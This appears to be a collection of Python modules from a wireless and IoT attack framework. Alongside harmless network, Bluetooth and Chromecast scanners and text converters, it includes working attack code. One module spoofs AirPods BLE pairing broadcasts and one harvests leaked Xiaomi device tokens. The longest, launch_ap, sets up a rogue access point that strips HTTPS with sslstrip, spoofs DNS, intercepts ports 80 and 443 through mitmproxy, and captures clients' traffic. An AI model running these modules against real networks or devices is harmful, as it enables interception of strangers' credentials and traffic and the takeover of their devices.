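def run(self):
    """Advertise a fake Apple proximity-pairing (AirPods) payload over BLE.

    Reads the module args ``random``, ``interval``, ``ble_iface`` and, unless
    ``random`` is "true", ``left_speaker`` / ``right_speaker`` / ``case``.
    Builds the 31-byte advertising payload, switches the HCI device on and
    advertises until Ctrl+C; advertising is always stopped on the way out.
    """
    use_random = str(self.args.get("random", "False")).lower() == "true"
    interval = int(self.args.get("interval", 10))
    dev_id = int(self.args.get("ble_iface", 0))

    if use_random:
        left_speaker, right_speaker, case = self.random_values()
    else:
        left_speaker = (int(self.args.get("left_speaker", 0)),)
        right_speaker = (int(self.args.get("right_speaker", 0)),)
        case = (int(self.args.get("case", 0)),)

    # Each accessory value becomes a single octet of the advertising payload,
    # so anything outside 0..255 cannot be encoded; reject it up front instead
    # of failing inside the HCI packing.
    for value in left_speaker + right_speaker + case:
        if not 0 <= value <= 255:
            print_error(f"Accessory value {value} out of range (0-255)")
            return

    toggle_device(dev_id, True)

    # One manufacturer-specific AD structure: 0x1e = 30 bytes follow, 0xff = AD
    # type "manufacturer specific", 0x4c 0x00 = Apple company id, then the
    # proximity-pairing body. The three accessory octets are spliced between
    # data1 and data2: 16 + 3 + 12 = 31 bytes in total.
    data1 = (0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x01, 0x02, 0x20, 0x75,
             0xaa, 0x30, 0x01, 0x00, 0x00, 0x45)
    data2 = (0xda, 0x29, 0x58, 0xab, 0x8d, 0x29, 0x40, 0x3d, 0x5c, 0x1b,
             0x93, 0x3a)
    payload = data1 + left_speaker + right_speaker + case + data2

    try:
        sock = bluez.hci_open_dev(dev_id)
    except Exception as exc:
        print_error("Cannot open bluetooth device %i (%s)" % (dev_id, exc))
        return

    try:
        print_info("Start advertising press ctrl + c to quit...")
        # adv_type 0x03 = ADV_NONCONN_IND: non-connectable, no scan responses.
        start_le_advertising(sock, adv_type=0x03, min_interval=interval,
                             max_interval=interval, data=payload)
        while True:
            sleep(2)
    except KeyboardInterrupt:
        print()
        print_error("Bye")
    except Exception as exc:
        print_error(f"Advertising failed: {exc}")
    finally:
        # Runs for Ctrl+C and for HCI errors alike, so the controller is not
        # left advertising after the task ends.
        stop_le_advertising(sock)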
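def run(self):
    """Discover Xiaomi (miIO) devices by sending the protocol "hello" to UDP/54321.

    Based on python-miio (https://github.com/rytilahti/python-miio). The hello
    is broadcast unless ``rhost`` is set; every host that answers is printed
    once together with the token field of its reply. ``timeout`` (seconds,
    default 5) bounds the whole listen phase.
    """
    try:
        timeout = int(self.args["timeout"])
    except (KeyError, TypeError, ValueError):
        timeout = 5

    # Module args arrive as strings, so the literal "None" means "broadcast".
    if str(self.args["rhost"]) != "None":
        addr = self.args["rhost"]
    else:
        addr = '255.255.255.255'

    print("Sending packets...")
    # miIO hello: magic 0x2131, length 0x0020, remaining header bytes 0xff.
    helobytes = bytes.fromhex('21310020ffffffffffffffffffffffffffffffffffffffffffffffffffffffff')

    seen = set()  # report each responder once
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.settimeout(timeout)
        s.sendto(helobytes, (addr, 54321))
        while True:
            try:
                data, peer = s.recvfrom(1024)
            except socket.timeout:
                print_ok("Discovery done")
                break
            except OSError as ex:
                print_error(f"Error while reading discover results: {ex}")
                break
            # The token occupies bytes 16..31 of the 32-byte reply header; hex()
            # replaces the old str(bytes) mangling, which broke on printable bytes.
            # NOTE(review): provisioned devices usually answer with a masked
            # (all 0xff) token here; only unprovisioned ones leak the real key.
            token = data[16:32].hex()
            if peer[0] not in seen:
                print_info(f"Xiaomi Device >> {peer[0]} - Token({token})")
                seen.add(peer[0])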
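def _subscribe(self):
    """Connect to the BLE device in ``self.args`` and subscribe to characteristic ``uuid``.

    Connection/subscription is retried every 3 s, giving up after five
    failures. Once subscribed, ``ble_device.subscribe()`` runs the
    notification loop; when it returns the loop reconnects, so the task only
    ends on Ctrl+C or after five consecutive failures.
    """
    bmac = self.args["bmac"]
    # NOTE(review): the encoded payload is built but never written here -
    # confirm whether it was meant to be sent before subscribing.
    self._transform_data(self.args["encode"], self.args["data"])
    try:
        iface = int(self.args["iface"])
    except (KeyError, TypeError, ValueError):
        iface = 0

    print_info(f"\nTrying to subscribe to {bmac}")
    ble_device = BLE(bmac, self.args["type"], iface)

    subscribed = False
    failures = 0
    while True:
        ready = False
        try:
            ble_device.connect()
            print_ok("\nDevice connected...")
            ble_device.set_subscribe(self.args["uuid"])
            subscribed = True
            ready = True
            ble_device.set_delegate(HomeSecurityDelegate)
        except KeyboardInterrupt:
            print("Module Interrupted")
            break
        except Exception:
            # Transient BLE errors (device out of range, busy link): back off
            # and retry, but do not loop forever.
            sleep(3)
            failures += 1
            if failures == 5:
                break
            continue
        if ready:
            ble_device.subscribe()
        print("")

    if subscribed:
        print_error(f"Unsubscribed {self.args['bmac']}")
    else:
        print_error(f"Unable to subscribe to {self.args['bmac']}")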
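def run(self):
    """ARP-scan ``rhost`` (an address or CIDR range) on ``iface`` and print the hosts that reply.

    ``timeout`` defaults to 2 s when missing or not an integer; ``verbose`` is
    the string "true"/"false" and is coerced to a bool for scapy.
    """
    try:
        timeout = int(self.args["timeout"]) if self.args["timeout"] else 2
    except (KeyError, TypeError, ValueError):
        timeout = 2
    self.args["timeout"] = timeout
    self.args["verbose"] = str(self.args["verbose"]).lower() == "true"

    print("Scanning...")
    # Broadcast who-has for every address in rhost; srp() returns
    # (answered, unanswered) and we only care about the answered pairs.
    answered = srp(Ether(dst="FF:FF:FF:FF:FF:FF") / ARP(pdst=self.args["rhost"]),
                   timeout=timeout, iface=self.args["iface"], inter=0.1,
                   verbose=self.args["verbose"])[0]
    msg = "Hosts alive"
    print(msg)
    print(len(msg) * "-")
    for _sent, reply in answered:
        print_info(f'MAC: {reply.hwsrc} - IP: {reply.psrc}')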
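def run(self):
    """List the Chromecast devices found on the LAN within ``timeout`` seconds.

    ``timeout`` is handed to pychromecast unchanged; callers are expected to
    have set it to a number.
    """
    print_info("Searching devices")
    chromecasts = pychromecast.get_chromecasts(timeout=self.args["timeout"])
    if not chromecasts:
        print_info("No devices found")
        return
    for cast in chromecasts:
        device = cast.device
        print_info(f"{device.friendly_name} ({device.cast_type} - {device.manufacturer}) => {cast.host}")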
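def output(self, err, monchannel):
    """Redraw the terminal with the current channel, the client list and the AP list.

    ``err``, when set, replaces the status line. The lists are iterated under
    ``self.lock`` because the sniffer thread mutates them; the emptiness checks
    are made outside the lock, so a list may grow between check and print.
    """
    os.system('clear')
    if err:
        print_error(err)
    else:
        print_ok(f'{self.mon_iface} channel: {monchannel}\n')

    if self.clients_APs and self.show_stations:
        print(' ch Client BSSID (ESSID)')
        with self.lock:
            for ca in self.clients_APs:
                print_info(
                    f"[*] {ca['channel'].ljust(2)} - {ca['client']} ({ca['vendor']}) - {ca['bssid_ap']} ({ca['essid_ap']})"
                )

    if self.APs and self.show_aps:
        print('\n Access Points Enc ch ESSID')
        with self.lock:
            for ap in self.APs:
                print(
                    f'[*] {ap["bssid"]} - {ap["encrypted"]} - {ap["ap_channel"].ljust(2)} - {ap["ssid"]}'
                )
    print('')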
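def run(self):
    """Find a Chromecast by ``name`` or ``rhost`` and play YouTube ``video`` on it.

    ``timeout`` defaults to 6 when the arg is the string "None". A device that
    is not found is reported; any other discovery/connection error is reported
    together with its cause instead of being masked as "not found".
    """
    if not self.args["rhost"] and not self.args["name"]:
        print_info("Show options, it's necessary to configure onename or rhost")
        return
    if str(self.args["timeout"]) == "None":
        self.args["timeout"] = 6

    try:
        chromecasts = pychromecast.get_chromecasts(timeout=self.args["timeout"])
        cast = next(cc for cc in chromecasts
                    if cc.device.friendly_name == self.args["name"]
                    or cc.host == self.args["rhost"])
        cast.wait()
        print_info("Device found, sending video")
    except StopIteration:
        print_error("Device no found")
        return
    except Exception as exc:
        print_error(f"Device no found ({exc})")
        return

    yt = YouTubeController()
    cast.register_handler(yt)
    yt.play_video(self.args["video"])
    print_ok("Done!")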
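def kill_task(self, index):
    """Stop the background task registered under ``index`` and drop it from ``self.tasks``.

    SIGINT is sent to the task's recorded pid (if any), the task is given
    ``th["wait"]`` seconds to wind down, then the worker is terminated and
    joined. Problems while stopping are reported but the registry entry is
    still removed so a dead task cannot block the list forever.
    """
    try:
        i = int(index)
        th = self.tasks.get(i, None)
        if not th:
            print_info("Task not found")
            return

        worker = th["thread"]
        pid = th["pid"]
        name = worker.name
        try:
            if pid:
                kill(pid, signal.SIGINT)
            # some task needs some time to stop
            sleep(th["wait"])
            # NOTE(review): terminate() exists on multiprocessing.Process, not
            # threading.Thread - the registry presumably stores processes.
            worker.terminate()
            worker.join()
        except Exception as exc:
            # Best effort: the process may already be gone (ProcessLookupError)
            # or never started; say so rather than hiding it.
            print_error(f"Task {index} did not stop cleanly: {exc}")
        del self.tasks[i]
        print_info(f"Task {index} - {name} has been killed")
    except Exception as e:
        print(e)
        print_error("It has not been possible to kill the task")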
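def run(self):
    """Scan one port (``rport``) or an inclusive range (``rports`` as "first-last") with ``self._scan``.

    Ranges are scanned by a pool of 4 workers. ``timeout`` defaults to 2 when
    missing or not an integer. A range must satisfy 0 <= first <= last <= 65535.
    """
    try:
        timeout = int(self.args["timeout"]) if self.args["timeout"] else 2
    except (KeyError, TypeError, ValueError):
        timeout = 2
    self.args["timeout"] = timeout

    if self.args["rport"]:
        self._scan(int(self.args["rport"]))
        return
    if not self.args["rports"]:
        print_info("rport or rports must be configured")
        return

    try:
        first, last = (int(p) for p in self.args["rports"].split("-"))
    except ValueError:
        # Wrong number of parts or a non-numeric part ("rposts" typo fixed).
        print_error("Bad format in rports")
        return
    if not 0 <= first <= last <= 65535:
        print_error("Bad format in rports")
        return

    try:
        # The context manager terminates the workers even if a scan raises.
        with Pool(4) as pool:
            pool.map(self._scan, range(first, last + 1))
    except Exception as exc:
        print_error(f"Scan failed: {exc}")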
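def start_some_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if):
    """Start the optional capture tools (wireshark, driftnet, tshark) in detached screen sessions.

    ``script_path`` must end with a path separator; captures are written to
    ``<script_path>logs/``. The interface name and paths are shell-quoted
    because they are spliced into a shell command line.
    """
    import shlex

    iface = shlex.quote(ap_iface)
    if wireshark_if:
        print_info("Starting WIRESHARK...")
        pcap = shlex.quote(script_path + "logs/mitmap-wireshark.pcap")
        os.system(f"sudo screen -S mitmap-wireshark -m -d wireshark -i {iface} -k -w {pcap}")
    if driftnet_if:
        print_info("Starting DRIFTNET...")
        os.system(f"sudo screen -S mitmap-driftnet -m -d driftnet -i {iface}")
    if tshark_if:
        print_info("Starting TSHARK...")
        pcap = shlex.quote(script_path + "logs/mitmap-tshark.pcap")
        os.system(f"sudo screen -S mitmap-tshark -m -d tshark -i {iface} -w {pcap}")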
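def run(self):
    """Print the hex and binary encodings of the ``ascii`` arg."""
    ascii_text = self.args["ascii"]
    try:
        binary_text = self.text_to_bits(ascii_text)
        hex_text = ascii_text.encode("utf-8").hex()
    except (AttributeError, TypeError, ValueError) as exc:
        # Non-string input or text the helper cannot encode.
        print_error(f"Error processing input ({exc})")
        return
    print_info(f"Input -> {ascii_text}")
    print_info(f"|_ Hex: {hex_text}")
    print_info(f"|_ Bin: {binary_text}")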
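def run(self):
    """Decode the ``binary`` arg (a bit string) and print its hex and ASCII forms."""
    binary_text = self.args["binary"]
    try:
        ascii_text = self.text_from_bits(binary_text)
        hex_text = ascii_text.encode("utf-8").hex()
    except (AttributeError, TypeError, ValueError) as e:
        # Malformed bit string or bytes that do not form valid text.
        print(e)
        print_error("Error processing input")
        return
    print_info(f"Input -> {binary_text}")
    print_info(f"|_ Hex: {hex_text}")
    print_info(f"|_ Ascii: {ascii_text}")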
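def run(self):
    """Decode the ``hex`` arg and print its ASCII and binary forms."""
    hex_text = self.args["hex"]
    try:
        # binascii.Error and UnicodeDecodeError are both ValueError subclasses.
        ascii_text = binascii.unhexlify(hex_text).decode()
        binary_text = self.text_to_bits(ascii_text)
        normalized_hex = ascii_text.encode("utf-8").hex()
    except (AttributeError, TypeError, ValueError) as exc:
        print_error(f"Error processing input ({exc})")
        return
    print_info(f"Input -> {normalized_hex}")
    print_info(f"|_ Ascii: {ascii_text}")
    print_info(f"|_ Bin: {binary_text}")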
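def run(self):
    """List Bluetooth SDP services for ``bmac``, or for every reachable device when it is "None"."""
    print_info("Searching services...")
    bmac = self.args["bmac"]
    # User input is String (just in case): the literal "None" means "all devices".
    if str(bmac) == "None":
        print_info("This process can take time, patience")
        bmac = None
    services = find_service(address=bmac)
    if not services:
        print_info("No services found")
        return
    print_ok(f"Found {len(services)} services")
    print("")
    self._show_services(services)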
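def run(self):
    """Inquiry-scan for classic Bluetooth devices for ``timeout`` seconds and print address, name and class."""
    print("Searching devices...")
    try:
        duration = int(self.args["timeout"])
    except (KeyError, TypeError, ValueError):
        print_error("timeout must be an integer number of seconds")
        return

    devices = discover_devices(duration=duration, lookup_names=True,
                               flush_cache=True, lookup_class=True)
    msg = f"found {len(devices)} devices"
    print_info(msg)
    print("-" * len(msg))
    for addr, name, cl in devices:
        try:
            print_info(f"{addr} - {name} ({hex(cl)})")
        except UnicodeEncodeError:
            # The terminal cannot render the name: print it with escapes
            # instead of the b'...' repr that encode() used to produce.
            safe_name = str(name).encode("ascii", "backslashreplace").decode("ascii")
            print_info(f"{addr} - {safe_name} ({hex(cl)})")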
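def start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if):
    """Start the optional capture tools (wireshark, driftnet, tshark) in detached screen sessions.

    ``script_path`` must end with a path separator; captures go to
    ``<script_path>logs/<tool>.pcap``. Arguments are passed as a list (no
    shell), so interface names and paths with spaces or metacharacters are
    handed over verbatim; the old shell string also had a stray space after
    ``-w {script_path}`` that split the pcap path into two arguments.
    """
    if wireshark_if:
        print_info("Starting WIRESHARK...")
        subprocess.call(["sudo", "screen", "-S", "mitmap-wireshark", "-m", "-d",
                         "wireshark", "-i", ap_iface, "-k",
                         "-w", script_path + "logs/mitmap-wireshark.pcap"])
    if driftnet_if:
        print_info("Starting DRIFTNET...")
        subprocess.call(["sudo", "screen", "-S", "mitmap-driftnet", "-m", "-d",
                         "driftnet", "-i", ap_iface])
    if tshark_if:
        print_info("Starting TSHARK...")
        subprocess.call(["sudo", "screen", "-S", "mitmap-tshark", "-m", "-d",
                         "tshark", "-i", ap_iface,
                         "-w", script_path + "logs/mitmap-tshark.pcap"])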
def show_tag(self, tag, verbose):
    """Print an NFC tag: its NDEF capabilities and records, plus a memory dump when ``verbose``.

    NOTE(review): the dump is printed whether or not the tag carries NDEF,
    mirroring nfcpy's tagtool layout - confirm against the original nesting.
    """
    print(tag)
    ndef = tag.ndef
    if ndef:
        print_info("NDEF Capabilities:")
        print_body(f" readable = {self.get_color(ndef.is_readable)}")
        print_body(f" writeable = {self.get_color(ndef.is_writeable)}")
        print(f" capacity = {ndef.capacity} byte")
        print(f" message = {ndef.length} byte")
        if ndef.length > 0:
            print_info("NDEF Message:")
            for number, record in enumerate(ndef.records, start=1):
                print_ok(f"record {number}")
                print(f" type = {record.type!r}")
                print(f" name = {record.name!r}")
                print(f" data = {record.data!r}")
    if verbose:
        print_info("Memory Dump:")
        print(" " + "\n ".join(tag.dump()))
def run(self):
    """Sniff 802.11 frames on ``iface``/``channel`` until Ctrl+C; stations are not listed."""
    print_info("Use CTRL^C to end this task")
    sniffer = Sniffing(iface=self.args["iface"],
                       channel=self.args["channel"],
                       show_stations=False)
    sniffer.start_sniffing()
def disconnect(self):
    """Close the active BLE connection, if any, and clear ``self.device``."""
    if not self.device:
        return
    self.device.disconnect()
    self.device = None
    print_info("\nDisconnected")
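def handleNotification(self, cHandle, data):
    """bluepy delegate callback: print a notification's handle, hex and text form.

    Notification payloads are frequently raw binary, so undecodable bytes are
    replaced instead of letting ``UnicodeDecodeError`` escape the callback.
    """
    print_info(f"A Notification was received from {cHandle}: ")
    print_info(f"|_ Hex: {binascii.b2a_hex(data)}")
    print_info(f"|_ Ascii: {data.decode('utf-8', errors='replace')}")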
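def start_dns_masq():
    """(Re)start dnsmasq with the current /etc/dnsmasq.conf.

    Stops the init.d service (quietly; it may not exist on this host), kills
    any leftover instance, then launches dnsmasq through sudo. Commands are
    passed as argument lists, so no shell is involved.
    """
    print_info("Starting DNSMASQ server...")
    subprocess.call(["sudo", "/etc/init.d/dnsmasq", "stop"],
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    subprocess.call(["sudo", "pkill", "dnsmasq"])
    subprocess.call(["sudo", "dnsmasq"])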
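def _stop_screen_session(session):
    """Send the ``^C`` caret sequence to a detached screen session via ``stuff``.

    NOTE(review): relies on screen translating caret notation into a real
    Ctrl+C; verify on the target screen version.
    """
    os.system(f"sudo screen -S {session} -X stuff '^C\n'")


def _restore_ap_host_config(sslstrip_if, driftnet_if, wireshark_if, tshark_if, dns_if, script_path):
    """Stop the helper sessions and restore NetworkManager, dnsmasq and iptables.

    Every command goes through ``sudo`` and ``os.system``, which never raises,
    so the sequence is safe to run a second time after an interrupted attempt.
    """
    import shlex

    if sslstrip_if:
        for session in ("mitmap-hostapd", "mitmap-sslstrip", "mitmap-dns2proxy"):
            _stop_screen_session(session)
        if dns_if:
            print_info("Restoring old " + script_path + "src/dns2proxy/spoof.cfg...")
            spoof_cfg = shlex.quote(script_path + "src/dns2proxy/spoof.cfg")
            spoof_bak = shlex.quote(script_path + "src/dns2proxy/spoof.cfg.backup")
            os.system(f"sudo mv {spoof_bak} {spoof_cfg}")
    if wireshark_if:
        _stop_screen_session("mitmap-wireshark")
    if driftnet_if:
        _stop_screen_session("mitmap-driftnet")
    if tshark_if:
        _stop_screen_session("mitmap-tshark")

    print_info("Restoring old NetworkManager.cfg")
    if os.path.isfile("/etc/NetworkManager/NetworkManager.conf.backup"):
        os.system("sudo mv /etc/NetworkManager/NetworkManager.conf.backup /etc/NetworkManager/NetworkManager.conf > /dev/null 2>&1")
    else:
        # No backup means launch_ap found no NetworkManager.conf to copy, so the
        # file on disk is the one we wrote; remove it rather than restore it.
        # NOTE(review): a backup lost for any other reason also lands here.
        os.system("sudo rm /etc/NetworkManager/NetworkManager.conf > /dev/null 2>&1")
    print_info("Restarting NetworkManager...")
    os.system("sudo service network-manager restart")

    print_info("Stopping DNSMASQ server...")
    os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1")
    os.system("sudo pkill dnsmasq")
    print_info("Restoring old dnsmasq.cfg...")
    os.system("sudo mv /etc/dnsmasq.conf.backup /etc/dnsmasq.conf > /dev/null 2>&1")
    print_info("Deleting old '/etc/dnsmasq.hosts' file...")
    os.system("sudo rm /etc/dnsmasq.hosts > /dev/null 2>&1")

    print_info("Flushing iptables rules...")
    os.system("sudo iptables --flush")
    os.system("sudo iptables --flush -t nat")
    os.system("sudo iptables --delete-chain")
    os.system("sudo iptables --table nat --delete-chain")


def stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path):
    """Tear down everything ``launch_ap`` set up and put the host's network config back.

    Stops the hostapd/sslstrip/dns2proxy and capture-tool screen sessions,
    restores NetworkManager.conf, dnsmasq.conf and dns2proxy's spoof.cfg from
    their ``.backup`` copies, restarts NetworkManager, kills dnsmasq and
    flushes iptables. A Ctrl+C during teardown re-runs the same steps so the
    host is not left half-restored. ``ap_iface``, ``net_iface``, ``channel``,
    ``hostapd_wpa`` and ``ssid`` are kept for interface compatibility only.
    """
    try:
        print_info("Stopping AP")
        _restore_ap_host_config(sslstrip_if, driftnet_if, wireshark_if, tshark_if, dns_if, script_path)
        #print_info("Traffic have been saved to the 'log' folder!")
        print_ok("mitmAP stopped.")
    except KeyboardInterrupt:
        print_info("\n\n[!] Stopping... \n(Dont worry if you get errors)")
        _restore_ap_host_config(sslstrip_if, driftnet_if, wireshark_if, tshark_if, dns_if, script_path)
        print("Module stopped.")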
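def launch_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, wpa_passphrase, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, all_dns, proxy_if):
    """Bring up a rogue access point on ``ap_iface``, NAT'ed out through ``net_iface``.

    Steps (all through ``sudo``):
      1. back up and rewrite /etc/NetworkManager/NetworkManager.conf so that
         ``ap_iface`` is unmanaged, restart NetworkManager;
      2. back up and rewrite /etc/dnsmasq.conf (DHCP 10.0.0.3-20, gateway
         10.0.0.1; ``port=0`` in sslstrip mode so dns2proxy can own port 53);
      3. write /etc/hostapd/hostapd.conf (open, or WPA2-PSK when ``hostapd_wpa``);
      4. set 10.0.0.1/24 on ``ap_iface`` and install MASQUERADE/FORWARD rules;
      5. run one mode until Ctrl+C:
         * ``sslstrip_if``: sslstrip2 (port 9000) and dns2proxy in screen
           sessions, HTTP and DNS redirected to them, spoof entries from
           ``all_dns["ssl"]`` when ``dns_if``;
         * ``proxy_if`` != "no": hostapd in a screen session, mitmproxy in the
           foreground on 8080 (port 80 only for "nossl", else 80 and 443);
         * otherwise hostapd in the foreground, with ``all_dns["no_ssl"]``
           appended to dnsmasq.conf when ``dns_if``.
    ``stop_ap`` always runs in ``finally`` to restore the host.

    The ``*_if`` and ``hostapd_wpa`` flags arrive as strings ("true"/"false")
    and are coerced here; ``channel`` is interpolated verbatim into
    hostapd.conf and must already be a string.
    """
    import shlex

    sslstrip_if = str(sslstrip_if).lower() == "true"
    driftnet_if = str(driftnet_if).lower() == "true"
    wireshark_if = str(wireshark_if).lower() == "true"
    tshark_if = str(tshark_if).lower() == "true"
    dns_if = str(dns_if).lower() == "true"
    hostapd_wpa = str(hostapd_wpa).lower() == "true"

    # Fail before touching any system file: hostapd rejects a WPA-PSK passphrase
    # outside 8..63 characters, and the `finally` below would otherwise
    # "restore" files that were never backed up.
    if hostapd_wpa and not 8 <= len(str(wpa_passphrase)) <= 63:
        print_error("wpa_passphrase must be between 8 and 63 characters")
        return

    q = shlex.quote  # every value spliced into a shell line below is quoted
    try:
        script_path = os.path.dirname(os.path.realpath(__file__)) + "/../"
        # NOTE(review): world-writable so the sudo'ed capture tools can write
        # here, but any local user can then read or alter the captures.
        os.system("sudo chmod 777 " + q(script_path + "logs"))

        network_manager_cfg = "[main]\nplugins=keyfile\n\n[keyfile]\nunmanaged-devices=interface-name:" + ap_iface + "\n"
        print("Backing up NetworkManager.cfg...")
        os.system("sudo cp /etc/NetworkManager/NetworkManager.conf /etc/NetworkManager/NetworkManager.conf.backup")
        print("Editing NetworkManager.cfg...")
        write_file("/etc/NetworkManager/NetworkManager.conf", network_manager_cfg)
        print("Restarting NetworkManager...")
        os.system("sudo service network-manager restart")
        os.system("sudo ifconfig " + q(ap_iface) + " up")

        #DNSMASQ CONFIG
        print_info("Backing up /etc/dnsmasq.conf...")
        os.system("sudo cp /etc/dnsmasq.conf /etc/dnsmasq.conf.backup")
        print_info("Creating new /etc/dnsmasq.conf...")
        if sslstrip_if:
            # port=0 turns dnsmasq's DNS off; clients are pointed at 10.0.0.1 (dns2proxy).
            dnsmasq_file = "port=0\n# disables dnsmasq reading any other files like /etc/resolv.conf for nameservers\nno-resolv\n# Interface to bind to\ninterface=" + ap_iface + "\n#Specify starting_range,end_range,lease_time\ndhcp-range=10.0.0.3,10.0.0.20,12h\ndhcp-option=3,10.0.0.1\ndhcp-option=6,10.0.0.1\n"
        else:
            dnsmasq_file = "# disables dnsmasq reading any other files like /etc/resolv.conf for nameservers\nno-resolv\n# Interface to bind to\ninterface=" + ap_iface + "\n#Specify starting_range,end_range,lease_time\ndhcp-range=10.0.0.3,10.0.0.20,12h\n# dns addresses to send to the clients\nserver=8.8.8.8\nserver=10.0.0.1\n"
        print_info("Deleting old config file...")
        os.system("sudo rm /etc/dnsmasq.conf > /dev/null 2>&1")
        print_info("Writing config file...")
        write_file("/etc/dnsmasq.conf", dnsmasq_file)
        #/DNSMASQ CONFIG

        #HOSTAPD CONFIG
        if hostapd_wpa:
            # NOTE(review): with wpa=2 only RSN/WPA2 is enabled, so rsn_pairwise=CCMP
            # is what clients negotiate; the wpa_pairwise=TKIP entry is WPA1-only.
            hostapd_file = "interface=" + ap_iface + "\ndriver=nl80211\nssid=" + ssid + "\nhw_mode=g\nchannel=" + channel + "\nmacaddr_acl=0\nauth_algs=1\nignore_broadcast_ssid=0\nwpa=2\nwpa_passphrase=" + wpa_passphrase + "\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=TKIP\nrsn_pairwise=CCMP\n"
        else:
            hostapd_file = "interface=" + ap_iface + "\ndriver=nl80211\nssid=" + ssid + "\nhw_mode=g\nchannel=" + channel + "\nmacaddr_acl=0\nauth_algs=1\nignore_broadcast_ssid=0\n"
        print_info("Deleting old config file...")
        os.system("sudo rm /etc/hostapd/hostapd.conf > /dev/null 2>&1")
        print_info("Writing config file...")
        write_file("/etc/hostapd/hostapd.conf", hostapd_file)
        #/HOSTAPD CONFIG

        #IPTABLES
        print_info("Configuring AP interface...")
        os.system("sudo ifconfig " + q(ap_iface) + " up 10.0.0.1 netmask 255.255.255.0")
        print_info("Applying iptables rules...")
        os.system("sudo iptables --flush")
        os.system("sudo iptables --table nat --flush")
        os.system("sudo iptables --delete-chain")
        os.system("sudo iptables --table nat --delete-chain")
        os.system("sudo iptables --table nat --append POSTROUTING --out-interface " + q(net_iface) + " -j MASQUERADE")
        os.system("sudo iptables --append FORWARD --in-interface " + q(ap_iface) + " -j ACCEPT")
        #/IPTABLES

        #SSLSTRIP MODE
        if sslstrip_if:
            #SSLSTRIP DNS SPOOFING
            if dns_if:
                spoof_cfg = script_path + "src/dns2proxy/spoof.cfg"
                print_info("Backing up " + spoof_cfg + "...")
                os.system("sudo cp " + q(spoof_cfg) + " " + q(spoof_cfg + ".backup"))
                # NOTE(review): the shell redirections below run as the invoking
                # user, not root; this only works when the checkout is writable.
                os.system("sudo cat /dev/null > " + q(spoof_cfg))
                for ssl_dns_line in all_dns["ssl"]:
                    os.system("sudo echo -e " + q(ssl_dns_line) + " >> " + q(spoof_cfg))
            #/SSLSTRIP DNS SPOOFING
            start_dns_masq()
            os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000")
            os.system("sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 53")
            os.system("sudo iptables -t nat -A PREROUTING -p tcp --dport 53 -j REDIRECT --to-port 53")
            os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
            print_info("Starting AP on " + ap_iface + " in screen terminal...")
            os.system("sudo screen -S mitmap-sslstrip -m -d python " + q(script_path + "src/sslstrip2/sslstrip.py") + " -l 9000 -w " + q(script_path + "logs/mitmap-sslstrip.log") + " -a")
            dns2proxy_cmd = "cd " + q(script_path + "src/dns2proxy") + " && python dns2proxy.py"
            os.system("sudo screen -S mitmap-dns2proxy -m -d sh -c " + q(dns2proxy_cmd))
            time.sleep(5)
            os.system("sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf")
            start_some_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if)
            try:
                time.sleep(5)
            except KeyboardInterrupt:
                print("")
            print_ok("Done")
            # Idle until Ctrl+C; the KeyboardInterrupt propagates to the handler below.
            while True:
                time.sleep(1)
        #/SSLSTRIP MODE
        else:
            #DNSMASQ DNS SPOOFING
            if dns_if:
                # The original dnsmasq.conf was backed up above; copying again here
                # would overwrite that backup with the rewritten file.
                for no_ssl_dns_line in all_dns["no_ssl"]:
                    append_file("/etc/dnsmasq.conf", no_ssl_dns_line)
            else:
                print_info("Skipping..")
            #/DNSMASQ DNS SPOOFING
            start_dns_masq()

            #MITMPROXY MODE
            proxy_if = proxy_if.lower()
            if proxy_if != "no":
                if proxy_if == "nossl":
                    os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
                else:
                    print("To install the certificate, go to 'http://mitm.it/' through the proxy, and choose your OS.")
                    os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
                    os.system("sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080")
                os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
                print("Starting AP on " + ap_iface + " in screen terminal...")
                # The capture tools are started by start_some_services() below;
                # the flags are booleans here, so the old `== "y"` checks never ran.
                os.system("sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf")
                print("\nStarting MITMPROXY in 5 seconds... (press q and y to exit)\n")
                try:
                    time.sleep(5)
                except KeyboardInterrupt:
                    print("")
                # NOTE(review): -T/--host are pre-3.0 mitmproxy flags; verify
                # against the installed version.
                os.system("sudo mitmproxy -T --host --follow -w " + q(script_path + "logs/mitmap-proxy.mitmproxy"))
            else:
                print("Skipping proxy...")
            #/MITMPROXY MODE

            start_some_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if)
            os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
            print_info("Starting AP on " + ap_iface + "...\n")
            # Blocks until hostapd exits. NOTE(review): in proxy mode a hostapd
            # screen session is already up, so this second instance is expected
            # to fail on the busy interface and fall through to stop_ap.
            os.system("sudo hostapd /etc/hostapd/hostapd.conf")
            print_ok("Done")
    except KeyboardInterrupt:
        pass
    except Exception as e:
        print_error(e)
    finally:
        stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path)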
def handleNotification(self, cHandle, data):
    """bluepy delegate callback: log the notification's handle and its payload as hex."""
    payload_hex = binascii.b2a_hex(data)
    print_info(f"A Notification was received from {cHandle}: {payload_hex}")
